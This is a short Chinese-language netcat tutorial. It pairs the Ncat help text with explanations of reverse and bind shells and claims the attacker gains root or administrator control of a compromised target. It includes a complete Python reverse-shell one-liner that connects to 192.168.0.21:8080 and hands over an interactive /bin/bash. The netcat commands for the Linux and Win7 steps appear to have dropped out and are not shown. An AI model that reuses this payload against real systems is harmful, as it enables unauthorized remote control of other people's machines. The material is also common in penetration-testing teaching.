nc使用方法:
Ncat 7.50 ( https://nmap.org/ncat ) Usage: ncat [options] [hostname] [port] Options taking a time assume seconds. Append 'ms' for milliseconds, 's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms). -4 Use IPv4 only -6 Use IPv6 only -U, --unixsock Use Unix domain sockets only -C, --crlf Use CRLF for EOL sequence -c, --sh-exec <command> Executes the given command via /bin/sh -e, --exec <command> Executes the given command --lua-exec <filename> Executes the given Lua script -g hop1[,hop2,...] Loose source routing hop points (8 max) -G <n> Loose source routing hop pointer (4, 8, 12, ...) -m, --max-conns <n> Maximum <n> simultaneous connections -h, --help Display this help screen -d, --delay <time> Wait between read/writes -o, --output <filename> Dump session data to a file -x, --hex-dump <filename> Dump session data as hex to a file -i, --idle-timeout <time> Idle read/write timeout -p, --source-port port Specify source port to use -s, --source addr Specify source address to use (doesn't affect -l) -l, --listen Bind and listen for incoming connections -k, --keep-open Accept multiple connections in listen mode -n, --nodns Do not resolve hostnames via DNS -t, --telnet Answer Telnet negotiations -u, --udp Use UDP instead of default TCP --sctp Use SCTP instead of default TCP -v, --verbose Set verbosity level (can be used several times) -w, --wait <time> Connect timeout -z Zero-I/O mode, report connection status only --append-output Append rather than clobber specified output files --send-only Only send data, ignoring received; quit on EOF --recv-only Only receive data, never send anything --allow Allow only given hosts to connect to Ncat --allowfile A file of hosts allowed to connect to Ncat --deny Deny given hosts from connecting to Ncat --denyfile A file of hosts denied from connecting to Ncat --broker Enable Ncat's connection brokering mode --chat Start a simple Ncat chat server --proxy <addr[:port]> Specify address of host to proxy through --proxy-type <type> Specify proxy type ("http" or "socks4" or "socks5") --proxy-auth <auth> Authenticate with HTTP or SOCKS proxy server --ssl Connect or listen with SSL --ssl-cert Specify SSL certificate file (PEM) for listening --ssl-key Specify SSL private key (PEM) for listening --ssl-verify Verify trust and domain name of certificates --ssl-trustfile PEM file containing trusted SSL certificates --ssl-ciphers Cipherlist containing SSL ciphers to use --version Display Ncat's version information and exit See the ncat(1) manpage for full options, descriptions and usage examples
反向連接
在此示例中,目標使用端口4444反向連接攻擊主機。-e選項將Bash shell發回攻擊主機。請注意,我們也可以在Windows的cmd.exe上使用-e選項。假設我們已經在目標主機上找到了遠程代碼執行(RCE)漏洞。我們可以在目標主機上使用-e發出Netcat命令,並使用Netcat發出命令啟動反向shell。
先啟動攻擊端的監聽:
再在目標端啟動反向shell:
linux
然后可以在攻擊端控制目標端的服務器,以root權限;
win7
然后可以在攻擊端控制目標端的win7系統,以administrator權限;
python的反向shell:
import os,socket,subprocess; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('192.168.0.21',8080)) #重定向shell輸出 os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) #執行子程序 p=subprocess.call(['/bin/bash','-i'])
正向連接
在該圖中,目標使用Netcat偵聽器將Bash shell綁定到它特定端口4444。攻擊者使用簡單的Netcat命令連接到此端口。設置bind shell的步驟如下:
使用Netcat將一個bash shell綁定到4444端口。 從攻擊主機連接到端口4444上的目標主機。 從攻擊主機發出命令到目標主機上。
